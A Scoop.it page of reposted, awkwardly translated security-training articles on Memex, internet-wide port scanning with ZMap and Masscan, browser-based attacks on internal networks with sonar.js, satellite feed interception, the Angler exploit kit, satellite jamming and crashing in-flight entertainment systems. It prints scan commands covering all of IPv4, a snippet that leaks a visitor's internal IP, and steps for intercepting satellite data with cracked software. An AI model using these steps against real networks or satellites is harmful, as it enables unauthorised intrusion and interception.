Webimprints
492 views | +2 today
Follow
Your new post is loading...
Your new post is loading...
Scooped by David Thomas
Scoop.it!

MEMEX: Nuevo y muy potente motor de búsqueda de Web Oscuro (Deep Web)

MEMEX: Nuevo y muy potente motor de búsqueda de Web Oscuro (Deep Web) | Webimprints | Scoop.it

Motores de búsqueda de Google sólo indexa 5% de la Internet. Los sitios web que podemos ver a través de motores de búsqueda es llama como Surface Web. El resto de 95% de Internet se llama Deep Web. Páginas web de Deep Web no pueden ser indexadas por los motores de búsqueda y hay mucha actividad ilegal pasando en estos sitios de Dark Web. Para resolver estos problemas, el gobierno de Estados Unidos está financiando un proyecto para la creación del motor de búsqueda de Deep Web. Esto no sólo permitirá que el gobierno de Estados Unidos tenga el control de Internet por completo, pero también detener los delitos como la trata de personas, menciona Mike Stevens quien es el profesor de capacitación de seguridad de información de IICS.

El motor de búsqueda se denomina Memex; y registra todos los sitios web que los buscadores normales no pueden indexar, y presenta los resultados de forma gráfica para que los vínculos ocultos puedan ser identificados.

El gobierno de Estados Unidos está centrando en Memex para resolver problema de la trata de personas ya que se basa en gran medida en la Internet para atraer clientes. Sin embargo, el gobierno tiene planes de ir contra la ciber-delincuencia de Deep Web.

La web oscura pronto podría ser mucho más brillante con este nuevo motor de búsqueda que tiene como objetivo criminales. Memex depende en gran medida sobre indexación de los foros, servicios de chat, las ofertas de trabajo y otros servicios ocultos que permiten el comercio en Deep Web. Memex hará un

seguimiento y un mapa de la conexión entre los anuncios ilícitos con detalles de los delincuentes quienes publican esos. La búsqueda de imágenes se centra en los metadatos de imagen como número de serie de la cámara y comparación de imágenes para encontrar la coincidencia exacta según expertos de capacitación de seguridad de información.

Memex explora Deep Web para los anuncios que mandan los usuarios a sitios donde existen pornografía infantil u otra esclavitud humana. Por lo tanto, indexara las imágenes, fuentes y sitios web para que la información se puede utilizar para rastreara los criminales. Además toma los números de teléfono e información de correos electrónicos para rastrearlos. Memex ha sido diseñado para los usuarios normales sin antecedentes técnicos.

Memex tiene dos crawlers, Ache y Nutch. Ambos crawlers utilizan los datos que recogen en una forma única. Ambos crawlers requieren una lista de URL para indexar, que se llama una lista de seeds.

Nutch está desarrollado por Apache, y tiene interacción conSolr y Elasticsearch, y esto hace Memex diferente de Ache. Nutch ejecuta en rondas continuas de crawl. Nutch se ejecutará indefinidamente hasta que detuvimos. El número de páginas para crawl aumenta significativamente después de cada ronda en Nutch. Con Nutch, puede comenzar con una lista de seeds de 100 URL’s, y se puede encontrar más de 1000 páginas para crawl en la siguiente ronda.

Ache es desarrollado por la NYU. Ache es diferente de Nutch porque tenemos que crear un modelo de crawl antes de poder ejecutar un crawl. A diferencia de Nutch, Ache se puede detener en cualquier momento.

De acuerdo con profesor de capacitación de seguridad de información, el proyecto Memex está todavía en desarrollo sin embargo, está disponible para público en general para uso. Para ver como instalar Memex pueden abrir Gethub y buscar Memex-Explorer.

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

¿CÓMO ESCANEAR TODO INTERNET 3.7 MIL MILLONES DE IP’S EN POCOS MINUTOS?

¿CÓMO ESCANEAR TODO INTERNET 3.7 MIL MILLONES DE IP’S EN POCOS MINUTOS? | Webimprints | Scoop.it
Cómo escanear todo Internet IP’s|escáner de puertos de Internet|Zmap scáner de puertos|Masscan scáner de puertos|Scanraid escáner de puertos|Unicornscan scáner
David Thomas's insight:

Profesionales de hacking ético y servicios de auditoría de seguridad informática normalmente usan escáner para revisar la seguridad. Escaneo de todas las direcciones IP en Internet no es un trabajo fácil, y si usted no tiene los recursos de un botnet, un simple escaneo puede tomar meses. Va a ser muy difícil, si usted quiere tomar una grande foto de internet porque hacer un escaneo de las redes de internet ha tomado típicamente semanas o meses para terminar. Sin embargo, ahora esto es posible, explica expertos de servicios de seguridad informática con la ayuda de nuevas herramientas como ZMap, Masscan y otras. En este artículo vamos a cubrir diferentesherramientas avanzadas y muy rápidas de escaneo de puertos.

ZMap

ZMap está diseñado para ejecutar escaneos generalizados del espacio de direcciones IPv4 o gran parte de ellas. Es una poderosa herramienta para los investigadores de servicios de auditoría de seguridad informática, y se puede escanear el espacio de direcciones IPv4 entero con más de 1.4 millones de paquetes por segundo.

ZMap no pretende reemplazar los escáneres generales como Nmap, cual es excelente para el escaneo de subredes en profundidad. ZMap está diseñado para hacer un escaneo superficial – por lo general de un solo puerto o servicio – de todo el Internet, o al menos el Internet IPv4, desde una sola computadora dedicada, en menos de una hora. Ame Wilson, una consultara de servicios de auditoría de seguridad informática menciona que ZMap es capaz de escanear el espacio de direcciones públicas IPv4 más de 1300 veces más rápido que el Nmap.

ZMAP es competente de trabajar tan rápido porque utiliza grupos de cíclicos multiplicativos. ZMap ha sido diseñado para conseguir el paralelismo y el rendimiento. En primer lugar, es completamente sin estado, lo que significa que no conserva un estatus por conexión. En lugar de mantener una lista gigante de paquetes enviados, y el tiempo que han estado ahí, y cuánto más tiempo debe esperar para cada uno, y cuidadosamente actualización de la lista con cada respuesta; ZMAP simplemente deja todo eso a través de grupos de cíclicos multiplicativos explica Ame Wilson, consultara de servicios de auditoría de seguridad informática.

En segundo lugar, envía en paralelo tantos paquetes como la red lo permite, con el fin de lograr la mayor tasa posible. Los paquetes se envían en un orden aleatorio, por lo que si mucha gente hacen juntos no haya un ataque DDOS, de esta manera se reduce la probabilidad de sobrecarga de una única red. Aunque cada paquete sucesivo sigue una estricta secuencia algorítmica, los números IP rebotan en todo el espacio de direcciones IPv4. Como resultado, usted no recibe cientos o miles de paquetes que convergen en una sola subred al mismo tiempo.

Debido a estas razones con ZMAP podemos escanear alrededor de 3.7 billones de direcciones en las direcciones IPv4, en una hora así que con ZMAP realmente puede revisar todo el Internet.

 

Por defecto, ZMap realizará un escaneo SYN TCP en el puerto especificado a la máxima velocidad posible. Una configuración más conservadora que escaneará 10,000 direcciones aleatorias en el puerto 80 en un máximo 10 Mbps se puede ejecutar de la siguiente manera:

$ ZMap –bandwidth=10M –target-port=80 –max-targets=10000 –output-file=results.csv

ZMap puede utilizarse también para explorar bloques CIDR o subredes específicas. Por ejemplo, para escanear sólo 10.0.0.0/8 y 192.168.0.0/16 en el puerto 80, ejecute:

ZMap -p 80 -o results.csv 10.0.0.0/8 192.168.0.0/16

Acuerdo con experto de servicios de seguridad informática, por defecto, ZMap entregará una lista de direcciones IP distintas que respondieron correctamente (por ejemplo con un paquete SYN ACK). Le recomendamos utilizar un archivo de lista negra, para excluir tanto el espacio IP reservado/asignado (por ejemplo, multicast, RFC1918), así como las redes que soliciten ser excluidos de escaneos. Por defecto, ZMap utilizará un archivo de lista negra simple que contiene direcciones reservadas y no asignadas en /etc/ZMap/blacklist.conf.

 

MASSCAN : Escáner puertos de muchas IP’s

Este es el escáner de puertos de Internet más rápido, ya que puede escanear todo el Internet en menos de 6 minutos con la transmisión de 10 millones de paquetes por segundo, acuerdo con profesor de hacking ético. Produce resultados similares a Nmap y utiliza transmisión asíncrona. La principal diferencia es que esa herramienta es más rápido que los otros escáneres. Además, es más flexible, permitiendo rangos de direcciones arbitrarias y rangos de puertos. Masscan utiliza una pila TCP/IP personalizada y eso significa que algo que no sea escaneo de puertos simples causará variación con la pila TCP/IP local. Esto significa que usted tiene que utilizar la opción -S para utilizar una dirección IP independiente, o configurar su sistema operativo para usar cortafuegos en los puertos que Masscan usa.

Aunque Linux es la plataforma principal para esa herramienta, el código funciona bien en muchos otros sistemas como.

Windows w/ Visual StudioWindows w/ MingGWWindows w/ cygwinMac OS X /w XCodeMac OS X /w cmdlineFreeBSD

Para ir más allá de 2 millones de paquetes por segundo, necesita un adaptador de Ethernet de 10 gbps de Intel y un driver especial conocido como “PF_RING ADN”. Masscan no necesita ser reconstruido con el fin de utilizar PF_RING. Para utilizar PF_RING, es necesario construir los siguientes componentes:

libpfring.so (instalado en /usr/lib/libpfring.so)pf_ring.ko (su controlador de kernel)ixgbe.ko (su versión del controlador de Ethernet de 10 gbps de Intel)

 

Masscan puede hacer algo más que detectar si los puertos están abiertos explica expertos de servicios de seguridad informática. También puede completar la conexión TCP y la interacción con la aplicación en dicho puerto con fin de agarrar la información de “banner”. El problema con esto es que Masscan contiene su propia pila TCP / IP separada del sistema se ejecuta en. Cuando el sistema local recibe un SYN-ACK desde el objetivo, responde con un paquete RST que mata la conexión antes de Masscan puede agarrar banner. La forma más fácil de evitar esto es asignar Masscan una dirección IP independiente.

 

Cómo escanear todo Internet

Mientras que es útil para redes más pequeñas y redes internas, el programa está diseñado realmente con todo Internet en mente

# Masscan 0.0.0.0/0 -p0-65535

Escaneo de todo el Internet es malo. Por un lado, las partes de Internet reaccionan mal a analizarlos. Por otro lado, algunos sitios siguen a los escaneos y se suman su IP en una lista de prohibiciones, que le llevará, cortafuegos de partes útiles de Internet. Por lo tanto, recomendamos excluir una gran cantidad de rangos. Para la lista negra o excluir rangos, puede utilizar la siguiente sintaxis:

# Masscan 0.0.0.0/0 -p0-65535 –excludefile exclude.txt

 

Scanrand

Scanrand es un escáner de puerto de alta velocidad y route-tracer explica profesor de hacking ético de international institute o cyber security. Su alta eficiencia en la exploración se encuentra en su esquema de trabajo en particular. Es un escáner de red rápido que puede escanear hosts individuales hasta las redes muy grandes de manera eficiente. Scanrand puede hacer lo que se llama el escaneo TCP sin estado, que lo distingue de los otros escáneres de red. Scanrand toma un poco de enfoque diferente del escáner de red típico. Se implementa “dispara y olvida” ideología para escanear mezclando con un poco de matemáticas.

 

Scanrand se divide sí en dos procesos. Un proceso es responsable de hacer nada más que el envío de paquetes SYN usando libnet. El otro proceso es responsable de recibir las respuestas de los equipos remotos enviados utilizando libpcap. Una cosa importante a tener en cuenta es que estos procesos funcionan de forma independiente. No hay consultas con el otro proceso sobre “¿Usted envía este paquete?” o, “¿ Esto es un paquete válido?” Scanrand guarda lista de direcciones IP que están esperando una respuesta y el proceso de envío no espera una respuesta en absoluto. Se dispara un SYN, y luego pasa a la siguiente computadora dejando el proceso de recepción para resolver la avalancha de las respuestas.

 

Unicornscan

Unicornscan es una herramienta de código abierto (GPL) diseñada para ayudar en la recopilación de información y auditoría de seguridad. No se puede negar que Nmap establece el estándar para la exploración de puertos en Windows y sistemas UNIX. Sin embargo escaneo UDP y TCP (65k puertos) tardan mucho tiempo para terminar. Hay otro escáner que sobresale en la velocidad; Unicornscan es un escáner de puertos asincrónico sin estado que implementa su propia pila TCP / IP. Unicornscan pasa los puertos que se encuentra a Nmap y / o Amap para seguir con análisis.

Mejores Prácticas de Escaneo

Expertos de servicios de auditoría de seguridad informática ofrecen estas sugerencias para los investigadores que realizan escaneos en todo el Internet como directrices para la buena ciudadanía de Internet.

Coordinar con los administradores de redes locales para reducir los riesgos.Verifique que los escaneos no abrumar a la red local o el proveedor de internet.Señalan la razón de los escaneos en las páginas web y entradas de DNS de las direcciones del origen.Explicar con claridad el objetivo y el alcance de los escaneos en todas las comunicacionesProporcionar un medio simple de la exclusión voluntaria y honrar las solicitudes con prontitud.Llevar a cabo las exploraciones no más grande o más frecuente de lo que es necesario para los objetivos de investigación.Difundir el tráfico de exploración sobre las direcciones y tiempo cuando sea posible.

No hace falta decir que los investigadores de escaneos deben abstenerse de explotar vulnerabilidades o acceder a los recursos protegidos, y debe cumplir con todos los requisitos legales especiales en sus jurisdicciones.

 

Los problemas de seguridad y problemas éticos

Como de costumbre, la capacidad de descubrir casi instantáneamente las redes y computadoras que tienen vulnerabilidades de seguridad puede ser una buena cosa para los investigadores de sombrero blanco, pero pueda ser utilizado para el motivo malo por los hackers. Estos son seguramente buenas herramientas y probablemente serán adoptadas por muchos investigadores. Sin embargo, eso poderosos escáneres de Internet podrían ser utilizados por los hackers para actividades maliciosas como la detección y la explotación de las vulnerabilidades. La única cosa que un atacante necesita es una máquina potente y una red con buen ancho de banda. Hoy en día, estos requisitos se pueden satisfacer fácilmente mediante el lanzamiento de una máquina virtual en la nube. La existencia de estas herramientas demuestra también que la ventana de tiempo entre la presencia de vulnerabilidad y su detección por los hackers es corta día a día. Por esta razón, es importante asegurar adecuadamente su propia infraestructura.

Profesores de hacking ético recomiendan que estas herramientas deban ser usadas con cuidado, sin invadir la privacidad de otra persona como cualquiera puede usarlos.

 

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

¿CÓMO HACKEAR Y EXPLOTAR LA RED INTERNA Y IPS PRIVADAS?

David Thomas's insight:

Según una encuesta por empresa de seguridad informática, la mayoría de las personas creen que mientras se navegan por la Web que están protegidas por firewalls y redes aisladas a través de direcciones privadas del IP NAT. Con este entendimiento, asumimos la seguridad de los sitios web de intranet y las interfaces basadas en routers, cortafuegos, impresoras, teléfonos IP, sistemas de nómina, etc., aunque dejamos sin parchear. Pensamos que permanecen seguro dentro de la zona protegida y nada es capaz de conectar directamente desde el mundo exterior, ¿no?

Bueno, no del todo. Navegadores web pueden ser completamente controlados por cualquier página web, lo que les permite atacar los recursos de la red interna acuerdo con profesores de formación de hacking ético. La navegador web de cada usuario en una red empresarial se puede cambiar en un trampolín para los intrusos sin soluciones de seguridad perimetral avanzados.

Cómo alguien puede explotar la red interna

Un experto de empresa de seguridad informática explica los procedimientos para explotar la red interna:

Una víctima visita una página web maliciosa, que asume el control de su navegador Web. La página web maliciosa podría ser cualquiera página web, atada con un ataque XSS permanente que hackers están siendo aprovechado para la entrega de malware masivo.Cuando se ejecuta el malware, lo hace desde la perspectiva de la intranet de la víctima, donde nadie puede acceder directamente. Esto quiere decir que el navegador web de la víctima puede ser instruido para entregar su dirección de NAT IP y hacer conexiones en la red interna en nombre del atacante o víctima.El malware utiliza navegador web de la víctima como una plataforma de lanzamiento, donde el malware hace los análisis de puertos, fingerprinting de los servidores web en la red interna y revisa las soluciones de seguridad perimetral implementadas.El malware se inicia los ataques contra los objetivos internos y la información comprometida se envía fuera de la red para la colección.

 

Es fácil a obtener la dirección IP pública de un navegador web desde el servidor web, pero la dirección IP interna es poco difícil menciona profesores de formación de hacking ético. Esta es la pieza de información que necesitamos para comenzar a explorar y explotar intranet. Para obtener IP interna, tenemos que invocar Java en un navegador y un applet. Eso es una forma sencilla de hacerlo. El siguiente código carga el MyAddress.class y luego abre la URL de

 

http://webserver/dirección_ip.html?nat = XXXX

 

<APPLET CODE=”MyAddress.class”>

<PARAM NAME=”URL” VALUE=”http://webserver/ip_address.html?nat=”>

</APPLET>

 

Si el navegador web de la víctima es una Mozilla / Firefox, es posible omitir el requisito subprograma e invocar una socket de Java directamente desde el JavaScript.

 

function natIP() {

var w = window.location;

var host = w.host;

var port = w.port || 80;

var Socket = (new

java.net.Socket(host,port)).getLocalAddress().getHostAddress();

return Socket;

}

Framework para explotar la red interna

Sonar

Sonar.js es un marco que utiliza JavaScript, WebRTC, y algunas funciones onload para detectar dispositivos internos en una red. sonar.js funciona mediante la utilización WebRTC para enumerar hosts en vivo en la red interna. Mike Stevans profesor de formación de hacking ético explica que tras enumerar las direcciones internas sonar.js intenta vincular a los recursos estáticos como CSS, imágenes y JavaScript, mientras que conecta el controlador de eventos onload. Si carga los recursos con éxito e inicia el evento onload entonces sabemos que el anfitrión tiene este recurso.

¿Por qué es útil saber? Al obtener una lista de los recursos alojados en un dispositivo, podemos intentar hacer fingerprinting de los dispositivos y soluciones de seguridad perimetral.

¿Cómo funciona Sonar?

Al cargar payload de sonar.js en un navegador web moderno sucederá lo siguiente:

sonar.js utilizará WebRTC para enumerar lo IPs internas que tiene el usuariosonar.js luego intenta encontrar otros hosts en vivo de la red interna a través de webSockets.Si no se encuentra una gran cantidad en vivo, sonar.js comienza a intentar hacer fingerprinting mediante la vinculación a ella a través de

<img src=”x”> and <link rel=”stylesheet” type=”text/css” href=”x”>

y enganchar el proceso de onload. Si el recurso carga con éxito se activará un evento para lanzar el exploit acuerdo con resultados de fingerprinting.

Sonar.js trabaja sobre una base de datos de fingerprints. Fingerprint es simplemente una lista de los recursos conocidos en una red que se pueden vincular a y detectados a través onload. Ejemplos de esto incluyen imágenes, hojas de CSS style, e incluso JavaScript externo.

Acuerdo con expertos de empresa de seguridad informática, mediante la creación de sus propias fingerprints se puede construir exploits personalizados que serán lanzadas contra los dispositivos internos una vez que son detectados por sonar.js. Exploits comunes incluyen cosas como la Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. La idea es que usted puede utilizar estas vulnerabilidades para hacer cosas tales como modificar configuraciones DNS del router, el sacar archivos desde un servidor de archivos interno, y más.

Mediante el uso de sonar.js pentesting puede construir exploits contra los servidores internos de registro, routers, impresoras, teléfonos VOIP, y más menciona expertos de soluciones de seguridad perimetral . Debido a las redes internas a menudo están menos vigiladas, ataques como CSRF y XSS pueden ser de gran alcance para hacerse cargo de las configuraciones de los dispositivos internos de una red.

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Interceptar hackear comunicaciones satelital

Blog sobre Hacking ético industria aeronáutica y Seguridad en sistema de entretenimiento en avión Mexico US.
David Thomas's insight:

En el mundo actual usamos la comunicación satelital en diferentes aspectos y todos sabemos lo importante que son en nuestras vidas. Hay diferentes tipos de satélites, dependiendo de la distancia de la tierra y otros, dependiendo de sus órbitas. Circular y elíptica órbita son dos tipos de satélites orbitales.
Los satélites también se clasifican en función de su altura sobre la superficie terrestre. Los tipos de satélites son 
1. Low-Earth orbits (LEO)– Estos satélites están en el rango de 180 kilómetros a 2.000 kilómetros sobre la Tierra. La mayoría de estos satélites son para fines militares y para la recogida de datos meteorológicos.
2. Medium-Earth orbits (MEO)– Estos satélites están en el rango de 2.000 kilómetros hasta 36.000 kilómetros. Los satélites de navegación son de este tipo.
3. Geosynchronous orbits (GEO)– Satélites GEO, también conocidos como los satélites geoestacionarios, están en el rango mayor de 36.000 kilómetros. Satélites de televisión y la comunicación son de este tipo.
Los satélites utilizados para televisión o comunicaciones son de la órbita elíptica u órbita geoestacionaria. La mayoría de estos satélites utilizan el estándar DVB para la transmisión.
El Proyecto DVB es una alianza de 200 compañías de todo el mundo. DVB(Digital video broadcasting) se ha utilizado en todo el mundo para presentar contenidos multimedia y televisión. Normas de DVB han sido adoptadas por todos los países y es el punto de referencia para la televisión digital en todo el mundo. Los sistemas de DVB-S y DVB-C se utilizan mucho en todo el mundo. Alrededor de 1 billón de receptores DVB hay en todo el mundo. La señal DVB no está cifrada y se transmite de modo que cualquiera persona puede recibir la señal si tiene las herramientas y conocimientos adecuados. Hace mucho que los hackers están utilizando la técnica de descargar contenidos digitales de los satélites de forma gratuita. Abajo están los pasos para interceptar satélites según Mike Stevens profesor de capacitación de hacking ético satelital de International Institute of Cyber Security.

PASO 1 (HARDWARE)
Para interceptar las señales de satélite, necesitará una antena parabólica con Low Noise Block (LNB) conversor . Cuanto más grande sea la antena mejor será el alcance de la señal que se pueda recoger. El costo de una buena antena parabólica puede variar de 50 USD a 300 USD depende de tamaño. Es muy fácil a comprar una antena parabólica. 
El tamaño de la antena depende del satélite que desea interceptar; si quiere interceptar solo un satélite en particular, entonces una pequeña antena de 75cm también va a servir. Esta información puede encontrar fácilmente en Internet o puede visitar el sitio web de la empresa de satélite.
Puede obtener más información sobre el satélite que desea interceptar desde Internet; por ejemplo, abajo hay los detalles de algunos de los satélites en América Latina. 
Según profesor de hacking ético satelital de IICybersecurity, Mike Stevens usted puede usar Internet para encontrar ajustes de polarización (LNB Skew), Elevación, Azimuth para colocación de antena parabólica acuerdo con el satélite y ubicación.

PASO 2 (INTERFACE)
La siguiente cosa que usted necesita es una tarjeta sintonizadora DVB (DVB-S / S2 tarjeta sintonizadora). Una tarjeta sintonizadora DVB es un tipo de tarjeta que permite que las señales de satélite pueden ser recibidos por un ordenador. La mayoría de los sintonizadores DVB también funcionan como tarjetas de captura de contenido de vídeo y multimedia, lo que les permite grabar contenido de satélite en un disco duro. Las tarjetas vienen en PCI Express (PCIe), PCMCIA, ExpressCard, o normas de dispositivos USB. La tarjeta sintonizadora es fácilmente disponible en el mercado y cuesta alrededor de 100 dólares. Las diferentes marcas de tarjetas que funcionan sin problemas son DVBWorld, TBS / QBOX, Azureware, TechniSat, TechnoTrend, Genitech y TeVii. Según expertos de hacking ético satelital la tarjeta más utilizada es Technisat skystar 2. 

PASO 3 (FEED HUNTING)
Ahora se necesita un software para escáner señales de satélites (FEED HUNTING) para que pueda hacer el escaneo automático y streamreader.dll, es básicamente el controlador de protocolo que convierte las señales en datos legibles como archivos binarios y ASCII “Vídeos, documentos, páginas, torrentes, archivos iso “. Hay muchos software libre disponible en línea. Algunos de los programas de escañó son CrazyScan, Easy Blind Scan. Con esos programas usted puede hacer Blind Scan y Auto Scan fácilmente. 

PASO 4 (PESCAR SATÉLITE)
Usted necesitará un programa para interceptar dependiendo cuál sea su motivo final. Estos programas permiten descarga offline de datos, transmisión en vivo de la radio y video, Internet por satélite y interceptación de las señales. Algunos de estos programas son:

1. SkyGrabber
SkyGrabber es un software que se utiliza para sintonizar una antena parabólica para la mejor recepción de servicios de Internet por satélite o la programación de televisión. El software cuenta con el escáner que mencionamos en el paso 3 y da la opción de seleccionar un satélite de una lista desplegable. Prácticamente todas las redes de satélites regionales del mundo aparecen en esa lista, organizadas por la longitud. Si su proveedor de satélite no está en la lista, puede agregar manualmente el proveedor. Cuando usted ha elegido un satélite, el programa muestra configuración de señal que usted puede utilizar para apuntar la antena de satélite en la dirección correcta como explicamos en el paso 2. Además puede establecer filtros de archivos para descargar un tipo de archivos.
Incluso usted puede ver los programas de televisión a través de la tarjeta en el mismo tiempo que el uso del software para descargar contenido. Este software tiene un precio de alrededor de 40 USD Euros y pertenece una compañía rusa. Sin embargo la mayoría de la gente utiliza una versión crack de este software que esta disponible fácilmente.

2. Skynet
Un programa similar a SkyGrabber pero en esto tenemos que configurar PID para transpondedores específicos. Esta lista está disponible en Internet.

3. Fishnet
Este software es gratuito pero se utiliza mucho en Oriente Medio y es para las frecuencias de DSL para la descarga de los datos relacionados con DSL.

4. DVBDream
Software de Streaming para Windows. 

5. PROG DVB
Software de Streaming, también disponible para Android. 

6. ALTDVB
Software de Streaming. 

7. TSReader
TSReader es un analizador de señales de transporte, decodificador, y manipulador de señales MPEG-2.

8. DVBSNOOP
Dvbsnoop es un programa para analizar señales DVB/ MPEG, que le permitirá ver información de la corriente (en vivo) en forma legible por humanos. Su propósito es debug, dump o ver la información de señales digitales (por ejemplo, emisiones de televisión digital) enviado a través de satélite, cable o terrestre. Puede utilizar software como DVBSnoop con wireshark para fines de análisis de datos. Y puede ser utilizado para ataques avanzados de hacking. 

En el próximo artículo vamos a cubrir más sobre cifrado en satélites y ataques de hacking que involucran satélites con la ayuda de experto de hacking ético de las telecomunicaciones, Dan Morris. Este artículo es sólo con fines educativos.

Fuente:http://www.iicybersecurity.com/interceptar-comunicaciones-satelital.html

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

CÓMO FUNCIONA MUY PODEROSO Y PELIGROSO ANGLER EXPLOIT KI

David Thomas's insight:

El Angler Exploit Kit es un exploit kit muy poderoso y avanzado utilizados por los hackers. Este kit se ha considerado más potente de Blackhole exploit kit por los expertos de capitaciones seguridad informática y hacking ético, ya que ha causado mayor número de infecciones.

¿Porqué Kit Angler exploit kit es muy poderoso y peligroso?

1. Angler exploit kit utiliza diferentes exploits de día cero para explotar plugins del navegador como Java, Adobe Flash y Microsoft Silverlight.

2. Angler utiliza el drive-by download técnica de entregar el malware / payload dependiendo de la vulnerabilidad en la máquina. También se conoce como infección sin archivo (inyección de memoria RAM), el exploit se ejecuta en la memoria RAM. El

código se inyecta en algún proceso en ejecución, tales como iexplore.exe o javaw.exe, que luego se utiliza para más explotación. Debido a que el código del exploit no existe como un archivo, no se puede detectar a través de los sistemas de prevención de intrusos y antivirus. La carga útil es generalmente un programa que se llama dropper cuyo propósito es descargar e instalar uno o más programas de malware.

3. Los payloads utilizados en el kit incluyen troyanos bancarios como Zeus o Citadel, ransomware como Cryptolocker, Bedep malware de marketing y software de keylogging.

4. Angler también utiliza la nueva técnica conocida como "Domain Shadowing", que es una evolución de la ciber-delincuencia menciono el experto de seguridad informática de Instituto Internacional de la seguridad cibernética. Los hackers han usado Domain Shadowing antes también en 2011, pero en caso de Angler Exploit Kit esta técnica utiliza dominios legales hackeados para crear subdominios y distribuir malware. Domain Shadowing utiliza credenciales comprometidos de registrante y es muy difícil de detener. También es muy difícil de localizar a los delincuentes cibernéticos que están detrás de estos ataques porque las cuentas comprometidas son seleccionadas al azar. Así bad URL o una lista negra de URL no funciona aquí para proteger contra el ataque.

5. Angler Kit cambia hash y payloads mediante el uso de redirecciones de páginas antes de llegar a la página final de exploit para que los productos de seguridad no pueden detectarlo. Kit utiliza 302 Cushioning, o un "'cushion attack", para re direccionar las víctimas a sitios maliciosos sin el uso de técnicas, como iframes ocultos o tags de códigos externos.

6. Servidores web comprometidos con página de aterrizaje de explotar kit se pueden visitar sólo una vez desde una IP y los hackers están monitoreando activamente los servidores. Así que la ingeniería inversa del malware es difícil de acuerdo con experto de ingeniería inversa y curso de hacking ético en México, Mike Stevens.

7. El kit esta capaz de detectar máquinas virtuales y productos de seguridad en el sistema de la víctima y decidir no ejecutar el exploit. Así que la empresa de antivirus no puede hacer la ingeniería inversa del exploit kit.

8. Angler exploit kit utiliza el cifrado, la página web con ofuscación y descifrado de la carga útil en el equipo de la víctima entonces es muy difícil para IDS/IPS detectar eso.

Cómo funciona Angler Exploit Kit

1. La víctima accede a una página web y recibe un anuncio tipo pop-up. Este anuncio es la página web de servidor web comprometido.

2. Esta página web de servidor web comprometido redirige a un servidor intermedio. Así que IDS/IPS no puede detectar el malware.

3. Intermedio servidor redirige a un servidor web de hacker que aloja página de aterrizaje del Angler Exploit kit.

4. Angler Expolit kit página comprueba la presencia de vulnerable plug-ins en su navegador (Java, Flash y Silverlight) y información de la versión. También comprueba la presencia de la máquina virtual y software de seguridad como el software de ingeniería inversa de malware.

5. Si el software de seguridad se encuentra en la máquina de víctima, el exploit solo da el error java script.

6. Cuando se encuentra un navegador vulnerable o plug-ins sin software de seguridad, el exploit kit entregará payload cifrado y que se descifra en la memoria RAM y el código en inyectado en algún proceso en ejecución, como iexplore.exe o javaw.exe, que se explota para dar un acceso permanente a la máquina según Jim Taylor de empresa de capacitación de seguridad informática.

 Fuente:http://noticiasseguridad.com/importantes/como-funciona-muy-poderoso-y-peligroso-angler-exploit-kit/

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

How to do satellite jamming

Satellite jamming is a kind of censorship, whereby the government or hackers or criminals prohibit access to satellite and prevents the free flow of information. It is also referred to as intentional technical interference. Satellite jamming is a breach of law of Article 15 of Radio Regulations of the International Telecommunications Union as explained by ethical hacking course expert of International Institute of Cyber Security, Mike Stevens.

 

If any government like china where right of free speech is not allowed and government wants to control the media and communication done over other modes of communication like satellite then sometimes government can seek option of satellite jamming. This can help government or an organization to get a tight grip over the media and all modes of communication and control satellite television broadcasts from outside the country.

Satellite jamming incidents have occurred in various countries like Russia, Cuba, Iran, China and even in US as per information security training expert, James Taylor. International Satellites transponder receives information from uplink stations, which might be television stations or companies and then satellites broadcast the signal across various downlink stations on the ground.

Orbital jamming involves the criminal o hacker sending contradictory signals directly towards a satellite through his own or hacked uplink station. When these jamming signals are sent, frequencies mix with each other and the original feed is disrupted and nobody can hear the original signal/channel.

As satellite system works in groups of channels, when one channel is jammed, all others channel in the group are also disrupted. Orbital jamming done by some government causes censorship not only in their country but for other countries and continents too. For example, if Democracy oriented radio suffers an orbital jamming attack in China, all Indian viewers tuned into the same frequency from the same satellite will not be able to access that radio channel. As per ethical hacking course expert, neighboring channels can also be affected by jamming.

Terrestrial jamming occurs in a specific location and involves equipment. Rather than targeting the satellite itself, as is the case in orbital jamming, terrestrial jamming involves sending contradictory signals directly towards the local consumer-level satellite dish. The contradictory frequencies are area-specific, interfering only with the signals of satellite in a specific location. Small, portable terrestrial jammers have a range of 5 kilometers in urban areas. Big terrestrial jammers have range up to 50 kilometers. Terrestrial jammers also interfere with radio frequencies, thus affecting radio communications between the police, hospitals etc. Consumers will not find out whether they are experiencing terrestrial or orbital jamming. Information security training expert explained that the technology required for satellite jamming is fairly standard, easy to purchase, use and conceal and cost is around 4000 to 30000 USD. 

Source:http://www.iicybersecurity.com/satellite-jamming.html

more...
No comment yet.
Scooped by David Thomas
Scoop.it!

Estrellarse sistema de entretenimiento en avión

Blog sobre Hacking ético industria aeronáutica y Estrellarse sistema de entretenimiento en avión Mexico US.
David Thomas's insight:

En nuestro último artículo sobre el sistema de entretenimiento en vuelo hablamos sobre hacks de sistema de entretenimiento en vuelosy lo fácil es estrellarse estos sistemas. En este artículo vamos a cubrir algunos otros métodos para estrellarse un sistema de entretenimiento en vuelo. También vamos a entender con la ayuda de investigador de hacking ético, Jorge Ríos por qué la caída delos sistemas es visto como una vulnerabilidad de estos sistemas.

 

En el último artículo hemos cubierto algunos aspectos como el análisis del valor límite para encontrar vulnerabilidades de estos sistemas y cómo mediante el uso de análisis del valor límite alguien puede estrellarse el sistema. Durante nuestra conversación con el experto en capacitación de seguridad informática Anita Thomas, llegamos a la conclusión de que el riesgo de estrellarse y tal vez hacking de sistema de entretenimiento en vuelo es alto. En este artículo vamos a discutir algunos formas de estrellarse y restablecer estos sistemas.

 

